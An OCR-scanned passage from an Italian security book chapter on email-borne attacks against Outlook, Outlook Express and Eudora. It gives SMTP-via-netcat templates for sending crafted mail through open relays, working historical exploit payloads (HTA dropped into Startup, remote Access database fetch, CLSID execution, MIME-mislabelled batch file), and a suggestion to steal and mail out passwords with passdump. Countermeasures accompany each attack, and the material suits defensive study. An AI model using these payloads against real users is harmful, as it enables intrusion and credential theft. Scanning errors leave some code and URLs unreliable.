di pericolo: i messaggi di posta elettronica in formato HTML sono efficaci vettori di 
molti degli attacchi ai browser che abbiamo analizzato finora, forse in misura anco- 
ra maggiore. È sufficiente aggiungere una buona dose di tecnologie di codice mobi- 
le incorporate nei messaggi di posta elettronica per rendere quasi un gioco da ra- 
gazzi l'inganno ai danni degli utenti Intemet più ingenui. 


Sebbene in quesio paragrafo parliamo quasi esclusivamente di posta elettro- 
nica, è chiaro che queste tecniche si applicano anche ai messaggi inviati ai 
neu'sgroup di Internet. Anzi, tali tattiche possono produrre un danno anco- 
ra più diffuso rispetto agli attacchi spam che si servono di queste tecniche. 


Mail hacking I01 


Prima di entrare nell'analisi degli attacchi specifici, può essere utile vedere come 
viene inviato un generico messaggio di posta elettronica nocivo. È effettivamente 
più difficile di quanto possiate immaginare, perché la maggior parte dei client di 
posta elettronica moderni con interfaccia grafica non permette una manipolazione 
diretta del blocco di intestazione del messaggio SMTP (Stmple Mail Transfer Proto- 
col). Ironia della sorte, con tutte le critiche che Microsoft riceve in relazione alla vul 
nerabilità dei suoi prodotti a tali problemi dal punto di vista del ricevente, è estre- 
mamente difficile inviare messaggi con codice HTML manomesso a scopi malvagi 
con programmi come Outlook e DE (Outlook Express). Ovviamente invece gli utenti 
UNIX possono utilizzare i tradizionali client di posta elettronica 4 riga di comando 
per eseguire questa manipolazione. 

In ambiente Windows il nostro meccanismo preferito consiste nell'inviare manual: 
mente un messaggio direttamente a un server SMTP attraverso il prompt dei comandi: 
il modo migliore per effettuare questa operazione è reindirizzare un file di testo con- 
tenente i comandi SMTP e i dati appropriati attraverso netcat. Ecco come procedere. 
Per prima cosa scrivete i comandi SMTP e il messaggio desiderati în un file e chiamatelo 
malicious.txt: è importante dichiarare la corretta sintassi MIME (Multi-Part Internet 
Mail Extension), in modo che il messaggio riceva la corretta formattazione; in genere 
questi messaggi vengono inviati in HTML in modo che il corpo del messaggio stesso di- 
venti parte del pacchetto dati maligno. La sintassi che dev'essere assolutamente corretta 
€ quella delle tre righe che iniziano con “MIME-Version: 1.0”, come mostrato di seguito: 


helo 
mail from: <mallory@malweary.com> 


—_—r—rpy——— 
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rept to: <hapless@victim.net> 

data 

subject: Read this! 

Importance: high 

MIME-Version: 1.0 

Content-Type: text/html; charset=us-ascii 
Content-Transfer-Encoding: 7bit 

<HTML> 

<h2>Hello World!</h2> 

</HTML> 


quit 


Poi digitate questo file sulla riga di comando e reindirizzate l'output attraverso 
netcat, che dovrebbe essere puntato verso la porta 25 SMTP di un mail server ap- 
propriato, come in questo esempio: 


type malicious.txt | nc -vv mail.openrelay.net 25 


È superfluo sottolineare che un hacker molto probabilmente sceglierà un mail ser- 
ver oscuro che offre la ritrasmissione senza limitazioni dei messaggi SMTP e si im- 
pegnerà per mascherare il proprio indirizzo IP di origine in modo da non essere rin- 
tracciabile attraverso i log del mail server. 


Tali “ripetitori SMTP aperti” sono spesso oggetto di abuso da parte di chi si 
dedica alla pratica dello spam e possono essere facilmente scoperti sui news- 
group Usenet o di tanto in tanto sul sito http://mail-abuse.org. 


Le cose si complicano un po’ se desiderate anche inviare un allegato con il messaggio 
HTML, poiché dovete aggiungere un’altra parte MIME al messaggio e codificare l’alle- 
gato in formato Base64, secondo quanto indicato nella specifica MIME (RFC 2045-49). 
L’utility migliore per eseguire automaticamente questa operazione è mpack di John G. 
Myers, disponibile all'indirizzo http://ww.21st-century.net/Pub/Utilities/ 
Archivers, che aggiunge le intestazioni MIME appropriate in modo che l'output pos- 
sa essere inviato direttamente a un server SMTP. Ecco un esempio di codifica con 
mpack di un file chiamato plant.txt che fornisce come output un file plant .mim; 
l'argomento -s specifica la riga di oggetto del messaggio ed è facoltativo: 


mpack -s Nasty-gram -o plant.mim plant.txt 


E ora ecco la parte complessa. Questa parte MIME dev'essere inserita nel nostro mes- 
saggio in formato HTML. A tal fine utilizzeremo l'esempio precedente, malicious.txt e 
divideremo il messaggio ricorrendo ai confini MIME personalizzati definiti nelle righe 
“Content-type”. I confini MIME sono preceduti da doppi trattini e il confine di chiusu- 
ra presenta i doppi trattini anche come suffisso, Osservate anche l'annidamento di 
una parte MIME “multipart/alternative” (boundary2) che permette ai destinatari che 
utilizzano Outlook di decodificare correttamente il corpo del nostro messaggio HT- 
ML. Prestate attenzione alla collocazione delle interruzioni di riga, in quanto MIME 
può essere interpretato in modo piuttosto diverso in relazione alla posizione di queste 
ultime. Osservate infine che la priorità di questo messaggio (/mportance) è stata im- 
postata su Alta, un altro elemento della finestra concepito per adescare la vittima: 


helo somedomain.com 
mail from: <mallory@malweary.com> 
rept to: <hapless@victim.net> 
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data 

subject: Read this! 

Importance: high 

MIME-Version: 1.0 

Content-Type: multipart/mixed; 
boundary="_boundary1_" 


--_boundary1_ 
Content-Type: multipart/alternative; 
boundary="_boundary2_" 


--_boundary2_ 
Content-Type: text/html; charset=us-ascii 


<HTML> 
<h2>Hello World!</h2> 
</HTML> 


--_boundary2_-- 


--_boundary1_ 

Content-Type: application/octet-stream; name="plant.txt" 
Content-ID: <5551212> 

Content-Transfer-Encoding: base64 

Content-Disposition: inline; filename="plant.txt" 
Content-MD5: Psn+mcJEVvAfPWwoEc40XYTA== 


SSBjb3VsZGEgaGFja2VkIHlIhIGJhZCANCg== 
--_boundary1_-- 
quit 


Reindirizzando tutto ciò attraverso netcat a un server SMTP aperto, invierete un mes- 
saggio con formattazione HTML, con il file plant.txt come allegato, a hapless@vic- 
tim.net. Per avere una migliore comprensione dei confini MIME nei messaggi multipar- 
te, fate riferimento alla RFC 2046 Section 5.1.1 all'indirizzo ww.ietf.org/rfc/ 
rfc2046.txt. Potrebbe anche essere utile esaminare un messaggio di prova inviato a 
Outlook Express. Fate clic su Proprietà/Dettagli/Messaggio originale per visualizzare i 
dati grezzi (Outlook non permette di vedere tutti i dati grezzi SMTP). 

In tutto il capitolo faremo riferimento a questo metodo con il termine “capsula di 
mail hacking”. Ora invece applicheremo questa tecnica generale ad alcuni attacchi 
specifici realmente verificatisi per dimostrare il livello di rischio rappresentato dai 
messaggi di posta elettronica concepiti per danneggiare i destinatari. 


Contromisure generiche all’hacking 
della posta elettronica 


Ovviamente, la soluzione migliore sarebbe disabilitare il rendering dei messaggi 
HTML nel software client: sfortunatamente però questa operazione è difficile o im- 
possibile con la maggior parte dei client di posta elettronica odierni. Le “caratteristi 
che” Web aggiuntive che devono però essere disabilitate a ogni costo sono le tec- 
nologie legate al codice attivo. Abbiamo già descritto in precedenza come agire in 
tal senso nel paragrafo dedicato alle aree di protezione, tuttavia ripeteremo le istru- 
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zioni anche in questo, in modo che non vi siano dubbi. Per Microsoft Outlook e 
Outlook Express, impostate l’area di protezione su Area siti con restrizioni in Stru- 
menti/Opzioni/Protezione, come mostrato nella Figura 16.2 (ricordatevi che queste 
impostazioni non si applicano alla navigazione con IE, che utilizza le proprie), Que- 
sta singola impostazione affronta la maggior parte dei problemi identificati di segui- 
to ed è caldamente consigliata. Ovviamente è fondamentale una gestione sicura de- 
gli allegati. Il primo istinto della maggior parte degli utenti è incolpare il produttore 
del software per problemi come quello del virus ILOVEYOU (analizzato nel prosie- 
guo del capitolo), ma la realtà è che quasi tutti gli incidenti e le infezioni originate 
dalla posta elettronica richiedono una certa complicità da parte dell'utente. 

La patch di Outlook che risulta disponibile all'indirizzo http://office.micro- 
soft.com/downloads/2000/0ut2ksec.aspx rende ancora più difficile agli utenti la 
possibilità di avviare automaticamente gli allegati, costringendoli a fare clic su alme- 
no due finestre di dialogo prima di eseguire un file allegato (tra l’altro occorre sotto- 
lineare anche che essa imposta l’area di protezione su Siti con restrizioni). Non è a 
prova di errore (o di utente maldestro), come vedremo tra breve, tuttavia riduce no- 
tevolmente la possibilità di cadere vittime di possibili aggressioni. 

Questo comunque non deve esimere dall'utilizzo del buonsenso: non aprite i mes- 
saggi e non scaricate gli allegati se non conoscete il mittente! 


Esecuzione di codice arbitrario 
tramite posta elettronica 


Gli attacchi esaminati di seguito dimostrano l’esistenza di molti meccanismi diversi 
per l'esecuzione di comandi sul computer della vittima: molti di essi vengono attiva- 
ti semplicemente con l'apertura del messaggio o con la sua visualizzazione nella fi- 
nestra di anteprima di Outlook/Outlook Express. 


® Attacchi via posta elettronica che sfruttano 
il flag “safe for scripting” 


Diffusione: d 
Semplicità: 6 
Impatto: 10 
Fattore di rischio: 7 


Non esistono attacchi più letali di questo: la vittima non deve far altro che leggere il 
messaggio (o visualizzarlo nel riquadro di anteprima se Outlook/OE è configurato 
in tal senso). Non è necessario alcun intervento da parte dell'utente. Questa tremen- 
da pericolosità deriva ancora una volta dal controllo ActiveX Scriptlet.typelib che è 
contrassegnato come sicuro “safe for scripting”, come abbiamo visto in precedenza 
nel paragrafo su ActiveX. 

Anche Eyedog.ocx potrebbe essere utilizzato con la stessa semplicità, tuttavia que- 
sto specifico attacco si basa sull’ottimo codice di Georgi Guninski che si serve di 
Scriptlet.typelib, pubblicato all'indirizzo http: //ww.guninski.com/scrtlb-desc. 
html. Ecco una versione leggermente modificata del suo codice incollata in una 
capsula di mail hacking: 


helo somedomain.com 
mail from: <mallory@malweary.com> 


622 Capitolo 16 


rept to: <hapless@victim.net> 

data 

subject: Ya gotta read this! 

MIME-Version: 1.0 

Content-Type: text/html; charset=us-ascii 

Content-Transfer-Encoding: 7bit 

If you have received this message in error, please delete it. 

<object id="scr" classid="clsid:06290BDS-48AA-11D2-8432-006008C3FBFC"> 
</object> 

<SCRIPT> 

scr.Reset(); 

scr.Path="C:\\WIN98\\start menu\\programs\\startup\\guninski.hta"; 
scr.Doc="<object id'wsh' classid='clsid:F935DC22-1CF0-11D0-ADBI- 
00C04FD58A0B'></object><SCRIPT>alert(' written by Georgi Guninski 
http://ww.guninski.,com');wsh.run('c:\\WIN98\\command.com');</"+"SCRIPT>"; 
scr.write(); 

</SCRIPT> 

</object> 


quit 


Questo codice esegue un attacco che si svolge in due fasi. Innanzitutto crea un file 
HTML Application (con estensione .HTA) nella cartella Esecuzione automatica 
(Startup) dell'utente e scrive il pacchetto dati dello script al suo interno. La creazio- 
ne del file avviene silenziosamente e in modo quasi invisibile agli utenti non appe- 
na essi visualizzano l'anteprima del messaggio; l’unica cosa che potrebbero notare è 
una breve accensione della luce di attività del disco, occorre però guardare molto 
attentamente, La figura seguente mostra come appare il nostro messaggio nella ca- 
sella della posta in arrivo dell'utente di Outlook Express: è tutto quanto deve acca- 
dere perché l'attacco possa essere portato a termine. 


Se per errore ha ncevuto questo messaggio, 
per cortesia cancellalo. 


E 
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La seconda fase dell'attacco si verifica quando l’utente inevitabilmente riavvia il 
computer (ovviamente anche lo script stesso potrebbe riavviare il computer). Il file 
+HTA viene eseguito all'avvio (i file .HTA vengono interpretati automaticamente dal- 
la shell di Windows). Nell'esempio mostrato nella figura seguente l’utente viene ac- 
colto dal seguente messaggio pop-up. 


i Microsoft Internet Explorer [Sc] 


- Waiten by Gorg Guniak hip //wwanatbg/“o 


Questa è un'azione abbastanza innocua, ma la gamma di possibilità è praticamente 
illimitata: in questo frangente la vittima è completamente in balia dell’hacker. 

Il cosiddetto worm KAK non è altro che un attacco che sfrutta la vulnerabilità di Script- 
let e anch'esso può essere impiegato per aggredire gli utenti incauti e privi della ne- 
cessaria patch di Outlook/OE. Per maggiori informazioni su KAK, consultate la pagina 
http://ww.symantec.com/avcenter/venc/data/wscript.kakworm.html. 


Contromisure per il flag ‘safe for scripting” 


Procuratevi la patch per i componenti ActiveX Scriptlet/Eyedog, disponibile all'indi- 
rizzo http://ww.microsoft.com/technet/security/bulletin/ms99-032.asp. 

Ancora una volta è importante osservare che essa corregge soltanto il problema di 
Scriptlet ed Eyedog. Per essere veramente protetti, disabilitate ActiveX per i mail rea- 
der, come abbiamo visto in precedenza nel paragrafo dedicato alle aree di protezione. 


de 


de à Esecuzione di documenti MS Office mediante ActiveX 


Diffusione: 5 
Semplicità: 5 
Impatto: 10 
Fattore di rischio: 7 


Georgi Guninski non si è fermato lì quando ha sfruttato i tag ActiveX incorporati nei 
messaggi di posta elettronica in formato HTML per caricare controlli ActiveX poten- 
zialmente pericolosi. Le successive segnalazioni pubblicate sul suo sito mettevano 
in luce la possibilità di sfruttare la stessa tecnica anche per avviare documenti Mi- 
crosoft Office potenzialmente pericolosi (i documenti Office si comportano in 
modo molto simile ai controlli ActiveX stessi). Queste scoperte sono illustrate alle 
pagine http://ww.guninski.com/sheetex-desc.html (per i documenti Excel e 
PowerPoint) e http://ww.guninski.com/access-desc.html (che tratta l’avvio 
del codice VBA, Visual Basic for Applications, all’interno di database Access). 

In questo paragrafo prenderemo in esame la seconda di queste vulnerabilità per 
due motivi: innanzitutto il problema di Excel/PowerPoint è in realtà più interessante 
per la sua capacità di scrivere file su disco in modo surrettizio, che verrà analizzata 
in uno dei prossimi paragrafi; in secondo luogo, la vulnerabilità relativa ad Access è 
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più grave nell'opinione di molti esperti di sicurezza perché aggira qualunque mec- 
canismo di protezione applicato ad ActiveX dall'utente. Anche se le funzioni Acti- 
veX sono completamente disabilitate, siete quindi sempre vulnerabili. La gravità di 
questo problema è stata giudicata talmente elevata dal SANS Institute da essere de- 
finita “probabilmente l’errore di programmazione più grave per le workstation Win- 
dows (tutte le varietà, 95, 98, 2000, NT 4.0) che Microsoft abbia mai commesso” 
(http://www.sans.org/newlook/resources/win_flaw.htm). L'aspetto negativo è 
che questo apparente sensazionalismo potrebbe essere in linea con gli obiettivi. 

Il problema è legato ai controlli effettuati da Windows quando il file di Access 
(.MDB) viene caricato all’interno di IE da un tag OBJECT, come mostrato nel fram- 
mento di codice HTML proposto da Georgi Guninski: 


<OBJECT data="db3.mdb" id="d1"></OBJECT> 


Non appena IE incontra il tag OBJECT, scarica il database di Access specificato nel 
parametro data=, poi chiama Access per aprirlo. Ciò avviene prima di avvisare 
l'utente del potenziale pericolo legato all'esecuzione del database, pertanto questo 
si avvia indipendentemente in base a come IE/Outlook/OE è stato configurato per 
l'esecuzione dei controlli ActiveX. 

L'atacco di Georgi si affida a un file remoto ospitato sul suo sito Web e chiamato 
db3.mdb, un database Access che contiene un singolo modulo che avvia Wordpad. 
Ecco un'altra capsula di mail hacking che dimostra come sia possibile portare a ter- 
mine in pratica questo attacco: 


helo somedomain.com 

mail from: <mallory@attack.net> 

rept to: <hapless@victim.net> 

data 

subject: And another thing! 

Importance: high 

MIME-Version: 1.09 

Content-Type: text/html; charset=us-ascii 


<HTML> 

<h2>Enticing message here!</h2> 

<OBJECT data="http://ww.guninski.com/db3.mdb" id="d1"></OBJECT> 
<{HTML> 


quit 


In questo esempio abbiamo fornito il riferimento esplicito all'URL specifico del file 
db3.mdb di Georgi in modo che possa funzionare se inviato per posta elettronica (si 
veda la riga nel listato precedente che contiene l'URL http://ww.guninski. 
com/db3.mdb). SANS sostiene di aver utilizzato una condivisione SMB su Internet 
per ottenete il file di Access. Siamo sbalorditi: quanti server FTP conoscete che per- 
mettono l'esecuzione di comandi put e get senza sorveglianza? Di seguito analizze- 
remo altri punti di appoggio che potrebbero essere utilizzati dagli hacker per sferra- 
re questo genere di attacchi. 

I] punto fondamentale è che con il semplice rendering di questo tag, Internet Explo- 
rer/Outlook/Outlook Express scaricano e avviano un file contenente una potente 
macro VBA senza bisogno di alcun input da parte dell'utente. C'è qualcuno che non 
è spaventato da tutto questo? 
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© Contromisura: definizione di una password 
amministrativa di accesso 

La disabilitazione di ActiveX non arresta questo exploit di Access, pertanto è neces- 
sario applicare la patch in base alle istruzioni pubblicate alla pagina http://www 
.microsoft.com/technet/security/bulletin/M$00-049.asp. Desideriamo atti- 
rare particolare attenzione sulla patch specifica per il problema relativo ad Access 
{Microsoft la chiama vulnerabilità “TE Script”), che è disponibile all'indirizzo http: 
/[www.microsoft.com/windows/ie/downloads/critical/patchi1/default.asp. 
Microsoft consiglia anche una soluzione che è opportuno adottare anche nel caso 
in cui sia stata applicata la patch, che consiste nell’impostare una password Ammi- 
nistratore per Access (che di default è vuota), come spiegato di seguito. 

1. Avviate Access 2000 ma non aprite alcun database. 

2. Scegliete Strumenti/Protezione. 

3. Selezionate Account utenti e gruppi. 

4. Selezionate l'utente Amministratore, che dovrebbe essere definito di default. 

5. Passate alla scheda Cambia password di accesso. 

6. La password di Amministratore dovrebbe essere vuota se non è mai stata 

cambiata. 

7. Assegnate una password all'utente Amministratore. 

8. Fate clic su OK per uscire dal menu. 
Questo dovrebbe impedire l'esecuzione di codice VBA maligno con privilegi com- 
pleti. SANS osserva anche che il blocco della condivisione di file di Windows in 
uscita a livello del firewall (porte TCP 139 e TCP 445) ridurrà la possibilità che gli 
utenti vengano ingannati e indotti ad avviare il codice remoto. 


® Esecuzione di file con un parametro 
CLSID ActiveX diverso da zero 


Diffusione: 5 
Semplicità: 5 
Impatto: 10 
Fattore di rischio: 7 


Alla base di questa vulnerabilità c'è un commento quasi sbrigativo in un thread del- 
la mailing list Bugtraq (http://ww.securityfocus.com/) relativo alla vulnerabili- 
tà dell’introduzione forzata di file descritta su malware.com con il termine “force fe- 
eding” (ne parliamo in seguito). Weld Pond, uno straordinario hacker del noto 
gruppo LOpht e famoso per netcat NT (Capitolo 5), è intervenuto per conto del suo 
collega DilDog, del gruppo Cult of the Dead Cow, gli ideatori di Back Orifice 2000 
(Capitoli 4 e 14), per fornire un meccanismo per l'esecuzione di file introdotti forza- 
tamente nei computer degli utenti tramite la tecnica descritta al sito malware.com. 
Configurando un tag OBJECT ActiveX con un parametro CLSID diverso da zero nel 
corpo di un messaggio di posta elettronica maligno, qualunque file su disco può es- 
sere eseguito: questa spaventosa possibilità trasforma in un potenziale bersaglio 
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qualunque eseguibile sul disco dell'utente. Ecco un esempio di capsula di mail 
hacking: 


helo somedomain.com 

mail from: <mallory@attack.net> 

rept to: <hapless@victim.net> 

data 

subject: Read this! 

Importance: high 

MIME-Version: 1.0 

Content-Type: text/html; charset=us-ascii 


<HTML> 

<HEAD> 

</HEAD> 

<BODY> 

<OBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000' 
CODEBASE='C:\windows\calc.exe'></OBJECT> 

</BODY></HTML> 


quit 


Osservate il parametro CLSID diverso da zero: è l’ekemento che consente il funzio- 
namento dell'attacco. Il file da eseguire è semplicemente elencato nel parametro 
CODEBASE. 

Nel nostro test ci siamo però accorti che per il funzionamento del meccanismo è ne- 
cessario che diversi elementi abbiano caratteristiche ben definite. Per prima cosa con 
Outlook Express 5.00.2615.200 abbiamo dovuto impostare l’area di protezione su 
Bassa, e anche così ci appariva una finestra di dialogo che chiedeva di confermare 
l'esecuzione di un controllo non certificato quando cercavamo di avviare calc.exe nel- 
la cartella System. Gli utenti dovrebbero essere piuttosto sprovveduti per cadere in 
questo trabocchetto, tuttavia è un inizio interessante, in particolare se lo si considera 
assieme alla capacità di scrivere file su disco descritta da malware.com. 


Contromisure all’uso del parametro 
CODEBASE diverso da zero 


In base al nostro test, per risolvere questo problema è sufficiente impostare le aree di 
protezione al livello appropriato (si veda paragrafo relativo alle aree di protezione). 


® Buffer overflow del campo della data di Outlook/OE 


Diffusione: 7 
Semplicità: 9 
Impatto: 10 
Fattore di rischio: 9 


Sembra proprio che ActiveX costituisca il cuore della maggior parte di questi attac- 
chi. Ebbene, in un messaggio del 18 luglio 2000 venne annunciato un diverso tipo 
di vulnerabilità di Outlook/OE che non ha nulla a che vedere con ActiveX. 
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Si trattava di un classico problema di buffer overflow causato riempiendo la sezione 
GMT del campo della data nell’intestazione di un messaggio di posta elettronica 
con una quantità imprevedibilmente elevata di dati. Quando un messaggio di que- 
sto tipo viene scaricato tramite POP3 o IMAP4, il file INCETCOMM.DLL responsabi- 
le dell’analisi del token GMT non esegue un adeguato controllo dei limiti, provo- 
cando il crash di Outlook/OE e rendendo possibile l'esecuzione di codice arbitra- 
rio. Ecco un esempio del codice di attacco basato su quello segnalato su Bugtraq: 


Date: Tue, 18 July 2000 14:16:06 +<circa 1000 byte> 
<codice assembly da eseguire> 


Come abbiamo spiegato diverse volte in questo libro, una volta ottenuta la possibi- 
lità di eseguire comandi arbitrari, il gioco è fatto: un messaggio “infido” potrebbe si- 
lenziosamente installare trojan, diffondere worm, compromettere il sistema target, 
avviare un allegato, insomma praticamente eseguire qualunque operazione. 

Gli utenti di DE dovrebbero semplicemente aprire una cartella contenente un mes- 
saggio maligno per diventare vulnerabili: in genere il semplice atto di scaricare tale 
messaggio durante un controllo della posta provoca il crash/overflow. A questo 
punto gli utenti di DE sono come a un punto morto, perché non riescono in nessun 
modo a scaricare il messaggio e l'attacco provocherà il crash del programma a ogni 
successivo tentativo di recuperare la posta. Una soluzione per aggirare il problema 
potrebbe essere utilizzare un client di posta elettronica diverso da Outlook/OE per 
recuperare i messaggi e cancellare quello incriminato (supponendo che riusciate a 
capire di quale si tratta). Netscape Messenger fa un ottimo lavoro a questo riguardo, 
visualizzando il campo della data nel riquadro di anteprima in modo da indicare 
quali sono i messaggi manomessi. Gli utenti di Outlook sono vulnerabili se visualiz- 
zano in anteprima, leggono, rispondono o inoltrano un messaggio maligno di que- 
sto tipo. 

Inizialmente il codice dell'attacco venne inviato su Bugtrag, ma in seguito si scoprì 
che questo esempio era stato elaborato su misura per funzionare ai danni di un ser- 
ver di una LAN privata, e che pertanto non avrebbe funzionato se inviato tramite 
posta elettronica a utenti connessi a Internet. Sembra che l’invio sia stato effettuato 
erroneamente da Aaron Drew, che a quanto pare stava tentando di utilizzare una 
tecnica simile alla capsula di mail hacking che abbiamo delineato in questo capitolo 
e invece senza volere inviò un messaggio a Bugtraq. Per la cronaca, un messaggio 
di questo tipo assomiglierebbe più o meno al seguente; osservate, infatti, la riga 
Date in cui è da notare che l’overflow è stato omesso per brevità e indicato tramite 
parentesi quadre (che non sono necessarie nell'attacco vero e proprio): 


helo somedomain.com 

mail from: <mallory@attack.net> 

rept to: <hapless@victim.net> 

data 

Date: Sun, 7 May 2000 11:20:46 +[-1000bytes + exploit code in hex or 
ascii] 

Subject: Date overflow! 

Importance: high 

MIME-Version: 1.0 

Content-Type: text/plain; charset=us-ascii 


This is a test of the Outlook/0OE date field overflow. 


quit 
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Anche Underground USSR (Security Systems Research) all'indirizzo http://www. 
ussrback.com pretende un riconoscimento per la scoperta di questo difetto (0 al- 
meno per averne sentito parlare da un hacker di nome Metatron), sostenendo di 
aver atteso che Microsoft avesse preparato una patch prima di renderlo pubblico. 
USSR pubblicò il proprio exploit, che apre una connessione al proprio sito Web e 
che può essere eseguito nello stesso modo illustrato in precedenza. 


DD) Contromisure all’overflow del campo della data 


In base al bollettino pubblicato da Microsoft all'indirizzo http://ww.microsoft. 
com/technet/security/bulletin/MS00-043.asp, questa vulnerabilità può essere 
corretta installando l'aggiornamento disponibile sul sito http://ww.microsoft.com 
/windows/ie/downloads/critical/patch9/default.asp, oppure può essere elimi- 
nata tramite un'installazione predefinita di uno dei seguenti aggiornamenti: 


e Internet Explorer 5.01 Service Pack 1; 
e Internet Explorer 5.5 su qualunque sistema tranne Windows 2000. 


Gli utenti di Windows 2000 devono tornare alla 5.01, applicare la patch e poi ag- 
giornare il software alla versione 5.5. SFP (System File Protection) di Windows impe- 
disce l'aggiornamento di wab32.dll nel patch IE 5.5 su Win2K. 

Anche un'installazione non predefinita di questi aggiornamenti permette di elimina- 
re questa vulnerabilità, a patto di scegliere un metodo di installazione che includa i 
componenti aggiornati di Outlook Express (nel corso della procedura l'utente do- 
vrebbe ricevere un messaggio che chiede se desidera installare questi componenti). 


09 Quando viene installato su un computer Windows 2000, IE 5.5 non instal- 


la i componenti aggiornati di Outlook Express e pertanto non elimina la 
vulnerabilità. 


Osservate anche che Microsoft ha affermato che gli utenti di Outlook che hanno 
configurato il programma per utilizzare solo i servizi MAPI non saranno interessati 
al problema, indipendentemente dalla versione di Internet Explorer installata. Il file 
INETCOMM.DLL non è utilizzato quando i servizi di posta elettronica Internet non 
sono installati in Strumenti/Servizi. 


ai 
® Esecuzione MIME: Nimda 


Diffusione: 6 
Semplicità: 8 
Impatto: 10 
Fattore di rischio: 8 


Il famoso analista della sicurezza IE, Juan Carlos Garcîa Cuartango, ha rinvenuto 
questo problema, che influenza una combinazione tra uno strano comportamento 
di un allegato e-mail e il tag HTML del sempre versatile IFTRAME. Un modo simile di 
utilizzare IFRAME per eseguire allegati di posta elettronica tramite il loro Content-ID 
MIME è stato dimostrato da Georgi Guninski nel suo consultivo #9 del 2000, discus- 
so in precedenza. Il contributo di Juan Carlos è stato la scoperta che tipi di file ese- 
guibili possono essere eseguiti automaticamente dentro messaggi e-mail IE o HTML 
se sono erroneamente etichettati come il tipo MIME sbagliato; inoltre questa defini- 
zione sbagliata elude i filtri mail. 
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dice del worm Nimda. Per ulteriori informazioni, visitate l'indirizzo 
http://securityresponse.symantec.com/avcenter/venc/data/w32. 
nimda.a@mm.html. 


09) Questa vulnerabilità è stata sfruttata per la costruzione di una parte del co- 


Juan Carlos fornisce tre esempi di questa tecnica nel suo sito Web http://www. 
kriptopolis.com. Qui c'è una variazione che maschera un file batch chiamato 
hello.bat come fosse un file audio. Abbiamo modificato il codice di Juan Carlos 
per metterlo dentro una sintesi adeguata di haking mail per inviarlo a un server 
SMTP: 


helo somedomain.com 

mail from: mallory@attacker.com 

rept to: hapless@victim.net 

data 

Subject: Is Your Outlook Configured Securely? 

Date: Thu, 2 Nov 2000 13:27:33 +0100 

MIME-Version: 1.0 

Content-Type: multipart/related; 
type="multipart/alternative"; 
boundary="1" 

X-Priority: 3 

X-MSMail-Priority: High 

X-Unsent: 1 


--1 
Content-Type: multipart/alternative; 
boundary="2" 


--2 

Content-Type: text/html; 
charset="is0-8859-1" 

Content -Transfer-Encoding: quoted-printable 


<HTML> 

<HEAD> 

</HEAD> 

<BODY bgColor=3D#ffffff> 

<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe> 

If secure, you will get prompted for file download now. Cancel.<BR> 
If not, I will now execute some commands. ..<BR> 

</BODY> 

</HTML> 


dei 


--1 
Content-Type: audio/x-wav; 

name="hello.bat" 
Content-Transfer-Encoding: quoted-printable 
Content-ID: <THE-CID> 


echo OFF 

dir C:\ 

echo YOUR SYSTEM HAS A VULNERABILITY 
pause 
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quit 


Osservate il Content-ID della parte MIME con il boundary=1 del listato preceden- 
te: <THE-CID>. Questo Content-ID si riferisce a un IFRAME incluso nel corpo prin- 
cipale del messaggio (MIME parte 2) e tutte queste righe sono in neretto. Quando 
questi messaggi sono visti in anteprima con Outlook/OE, IFRAME viene prodotto 
automaticamente ed esegue la specifica parte del MIME che contiene alcuni sem- 
plici script batch che rinviano un avvertimento alla console, come mostrato nella 
figura seguente. 


C:\WINNT\System32\cmd.exe 


C:\Documents and Settings\Administrator>echo OFF 
Volume in drive C has no label. 
Volume Serial Number is 9498-F822 


Directory of C:\ 


04/17/2001 :16a 620 *test! 
04/08/2001 :46p <DIR> Documents an 
04/08/2001 :59p <DIR> Inetpub 
04/17/2001 :1la <DIR> Program File 
04/17/2001 :14a <DIR> test 
04/16/2001 :49p <DIR> WINNT 

1 File(s) 620 bytes 

5 Dir(s) 44,689,059, 840 bytes free 
OUR SYSTEM HAS A VULNERABILITY 
Press any key to continue 


Juan Carlos fornisce nel suo sito esempi Win32 eseguibili e VBS di questo attacco 
campione. La creazione di questi esempi è semplice quanto l'inserimento di codice 
appropriato nella parte MIME specificata da <THE-CID>. 

Questo attacco potrebbe essere anche implementato ospitando una pagina Web 
nociva, in ogni caso è decisamente una vulnerabilità molto grave, poiché permette 
agli hacker di eseguire un codice di loro scelta sul sistema della vittima semplice- 
mente spedendogli un e-mail. 

Una payload interessante da prendere in considerazione per un attacco di questo 
tipo è lo strumento passdump di janker (disponibile nei principali archivi di Inter- 
net). Passdump legge dalla memoria le password dell’utente Windows registrato e 
le scrive in %systemroot%\pass.txt. L'attacco di Juan Carlos potrebbe venire impie- 
gato per eseguire il passdump come un allegato MIME; in seguito uno degli altri at- 
tacchi di questo capitolo potrebbe leggere il file pass.txt e spedirlo via e-mail a un 
hacker in remoto servendosi delle tecniche come i worm della rubrica di Outlook 
(si veda il paragrafo seguente). Immaginate schiere di utenti Internet che inconsa- 
pevolmente inviano giorno dopo giorno le loro password... 
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Contromisure per l'esecuzione di contenuto MIME 


La soluzione a breve termine per questo problema è ottenere la patch dal bollettino 
MS01-020 di Microsoft che stabilisce le modalità in cui IE gestisce certi tipi MIME in- 
consueti quando sono intercalati in HTML. Questo cambia il comportamento di IE, 
lanciando automaticamente questi tipi MIME in allegati invece di richiedere di scari- 
care un file. Questo punto debole è catalogato come ID 2524 Bugtraq (http://www. 
securityfocus.com/bid/2524) ed è inserito nel Service pack 2 di Win 2000. 

La prevenzione a lungo termine per i problemi che riguardano l'esecuzione auto- 
matica è la configurazione di Outlook/OE per leggere e-mail nel modo più sicuro 
possibile. In particolare, se File Download è disattivato per la zona di sicurezza in 
cui viene letto l'e-mail, questo attacco non può verificarsi. Le zone di sicurezza IE 
sono state discusse precedentemente. 


® Vulnerabilità di Eudora 
dell'esecuzione di allegati nascosti 


Diffusione: 6 
Semplicità: 8 
Impatto: 10 
Fattore di rischio: 8 


Nel corso di questo capitolo, abbiamo affrontato molte delle vulnerabilità dei client 
di Microsoft, tuttavia Microsoft non è la sola società che deve affrontare questi pro- 
blemi dal lato client. Il ben noto client e-mail Eudora di Qualcomm per Windows 
contiene un punto debole, identificato dalle persone al malware.com, che rende 
possibile a un hacker di eseguire un codice arbitrario su un sistema remoto. Lo 
sfruttamento non richiede alcuna interazione utente oltre all'avvio di Eudora e al ca- 
ricamento di e-mail, dando per scontata la seguente configurazione (sulla versione 
freeware di Eudora 5.0.2 eseguita su Win 9x, NT 4 o 2000). 


e Il pannello di anteprima è abilitato, ma se non lo fosse un utente deve apri- 
re il messaggio di mail per far sì che il codice si esegua. 

